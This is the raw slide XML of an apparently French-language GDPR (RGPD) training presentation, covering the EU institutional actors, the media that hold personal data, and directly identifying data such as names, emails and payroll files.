        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198748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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les Acteurs institutionnels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Straight Connector 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF1A8C6-8F60-4EF2-B4D7-A5A5E94F69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E50A57D4-B86D-4B06-8DD8-6A2DBBF59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00099" y="2936846"/>
            <a:ext cx="3398089" cy="178554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4797971" y="1906418"/>
            <a:ext cx="6693941" cy="3923165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Coordonner l’action des autorités nationales &amp; conseiller les Etats membres de l’Union Européenne</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Ses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> missions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Publier des directives relatives au RGPD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conseiller la Commission Européenne et les membres</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Se prononcer sur les litiges &amp; Garantir l’uniformité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Donner son avis sur les projets de décisions des AAI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9760AA-CA3F-4C65-B688-B44307731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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409208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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les Acteurs institutionnels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Straight Connector 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF1A8C6-8F60-4EF2-B4D7-A5A5E94F69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E50A57D4-B86D-4B06-8DD8-6A2DBBF59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00099" y="3516385"/>
            <a:ext cx="3398089" cy="626463"/>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4797971" y="1906418"/>
            <a:ext cx="6693941" cy="3923165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Veiller à l’application uniforme de la législation &amp; sanctionner toute entité Publique ou Privée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cour de Justice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Traiter les demandes d’interprétation de la législation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Prendre &amp; Réviser des décisions de justice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les décisions sont contraignantes juridiquement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Tribunal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Statuer sur les recours en annulation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9760AA-CA3F-4C65-B688-B44307731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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370387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 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A9DD19-42AF-4F37-A8DB-3487F1245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8080" y="2696413"/>
            <a:ext cx="6878657" cy="4161587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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695324" y="897753"/>
            <a:ext cx="10896041" cy="1575391"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les données à caractère personnel</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 8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695325" y="2710035"/>
            <a:ext cx="3587668" cy="3500265"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une note sur un post-it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un document papier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un fichier informatique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une photographie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un fichier vidéo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un enregistrement audio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320988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49C99A08-B528-48B3-8C7E-F1D5ABDB7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8080" y="2696413"/>
            <a:ext cx="6878657" cy="4161587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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695324" y="897753"/>
            <a:ext cx="10896041" cy="1575391"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les données à caractère personnel</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 8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695324" y="2710035"/>
            <a:ext cx="4812591" cy="3500265"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Des données </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> identifiantes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Des données </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>indirectement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> identifiantes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Toute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>combinaison</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>d’informations</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>permettant d’identifier la personne</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187007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49C99A08-B528-48B3-8C7E-F1D5ABDB7A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34862" y="2408346"/>
            <a:ext cx="5026071" cy="4161587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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695324" y="897753"/>
            <a:ext cx="10896041" cy="1575391"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Des données </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> identifiantes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 8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695324" y="2408346"/>
            <a:ext cx="7082455" cy="1471107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Un élément de donnée indique clairement l’identité de la personne </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Données type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>: nom, prénom, email, photo, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC011688-1DE4-437E-86CF-E86D4794175D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695324" y="3988011"/>
            <a:ext cx="6254116" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="2">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Où trouver ces données ?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les fichiers de paie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les relevés de compte </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les devis</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="fr-FR"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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les factures </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les fichiers clients </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60391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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">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9" name="Rectangle 13">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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9172AB4-C6FC-4961-B1EA-A0CFA901521A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
